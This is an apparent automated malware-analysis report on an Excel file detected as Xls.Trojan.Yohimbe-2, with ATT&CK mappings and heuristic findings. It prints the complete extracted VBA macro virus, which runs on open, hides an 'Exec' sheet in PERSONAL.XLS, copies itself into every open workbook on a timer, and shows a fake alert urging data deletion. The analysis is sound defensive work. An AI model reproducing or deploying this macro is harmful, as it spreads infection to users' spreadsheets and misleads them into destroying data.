MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The file is an Excel document containing a VBA macro, specifically an Auto_Open macro, which is a common technique for initial execution. The macro attempts to copy a sheet named 'Exec' into the user's PERSONAL.XLS workbook, indicating an attempt to establish persistence. The ClamAV detection as 'Xls.Trojan.Yohimbe-2' strongly suggests the Yohimbe malware family, which is known for its macro-based delivery and payload execution.
Heuristics 3
-
ClamAV: Xls.Trojan.Yohimbe-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Yohimbe-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2665 bytes |
SHA-256: 2d49c6d69c033f984eefba7022f51a59be4ec0920dbde67107d6154121afe9b0 |
|||
|
Detection
ClamAV:
Xls.Trojan.Yohimbe-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "exec"
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo FixIt
Dim SaveBook As String
SaveBook = ActiveWorkbook.Name
Application.ScreenUpdating = False
Windows("PERSONAL.XLS").Visible = True
If SheetExists("Exec") Then
Windows("PERSONAL.XLS").Visible = False
GoTo AlreadyInfected
Else
Workbooks(SaveBook).Activate
Sheets("Exec").Select
Sheets("Exec").Copy Before:=Workbooks("PERSONAL.XLS").Sheets(1)
Workbooks("PERSONAL.XLS").Activate
ActiveWindow.SelectedSheets.Visible = False
Workbooks("PERSONAL.XLS").Sheets(2).Select
ActiveWindow.Visible = False
Workbooks("PERSONAL.XLS").Save
AlreadyInfected:
Workbooks(SaveBook).Activate
If SheetExists("Exec") Then
End
End If
Workbooks("PERSONAL.XLS").Sheets("Exec").Copy Before:=Workbooks(SaveBook).Sheets(1)
Sheets("Exec").Select
ActiveWindow.SelectedSheets.Visible = False
Workbooks(SaveBook).Sheets(2).Select
End If
GoTo OhKay
FixIt:
Workbooks(SaveBook).Activate
End
OhKay:
Application.OnTime EarliestTime:=TimeValue("4:00 PM"), Procedure:="DipDing"
MsgBox "You have been infected with the Laurie Virus. Delete all data files and reinstall Excel.", , "Alert"
End Sub
Sub DipDing()
Attribute DipDing.VB_ProcData.VB_Invoke_Func = " \n14"
Application.ScreenUpdating = False
Dim book As Workbook
For Each book In Workbooks
Windows("PERSONAL.XLS").Visible = True
Windows("PERSONAL.XLS").Activate
Sheets("Exec").Visible = True
Sheets("Exec").Copy Before:=book.Sheets(1)
Sheets("Exec").Visible = xlVeryHidden
Windows("PERSONAL.XLS").Visible = False
book.Save
Next book
End Sub
Function SheetExists(sName As String) As Boolean
Attribute SheetExists.VB_ProcData.VB_Invoke_Func = " \n14"
Dim aSheet As Object
SheetExists = False
For Each aSheet In ActiveWorkbook.Sheets
If (StrComp(aSheet.Name, sName, 1) = 0) Then
SheetExists = True
End If
Next aSheet
End Function
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.